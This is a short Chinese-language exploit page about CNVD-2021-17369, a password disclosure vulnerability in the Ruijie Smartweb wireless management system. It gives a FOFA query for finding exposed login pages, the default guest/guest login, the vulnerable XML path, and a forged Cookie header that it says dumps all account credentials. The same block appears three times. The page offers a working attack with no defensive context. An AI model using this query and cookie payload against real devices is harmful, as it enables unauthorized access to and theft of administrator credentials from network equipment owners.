CNVD-2021-17369_銳捷Smartweb管理系統_密碼信息洩露漏洞-棉花糖会员站

CNVD-2021-17369_銳捷Smartweb管理系統_密碼信息洩露漏洞

2021年7月15日发布

020

# CNVD-2021-17369 銳捷Smartweb管理系統密碼信息洩露漏洞

==FOFA==

title="无线smartWeb--登录页面"

==默認guest密碼==

guest/guest

==漏洞位置==

http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml

==漏洞利用==
Cookice添加以下內容

Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest

可以獲取所有賬戶信息
==參考==
https://mp.weixin.qq.com/s/EICYTqRWDRB8OfXKHxCBfQ

==FOFA==

title="无线smartWeb--登录页面"

==默認guest密碼==

guest/guest

==漏洞位置==

http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml

==漏洞利用==

Cookice添加以下內容

Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest

可以獲取所有賬戶信息
==參考==
https://mp.weixin.qq.com/s/EICYTqRWDRB8OfXKHxCBfQ
==FOFA==

title="无线smartWeb--登录页面"

==默認guest密碼==

guest/guest

==漏洞位置==

http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml

==漏洞利用==

Cookie添加以下內容

Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest

可以獲取所有賬戶信息
==參考==
https://mp.weixin.qq.com/s/EICYTqRWDRB8OfXKHxCBfQ

© 版权声明

文章版权归作者所有，未经允许请勿转载。

THE END

喜欢就支持一下吧

相关推荐

评论抢沙发

请登录后发表评论

请登录后查看评论内容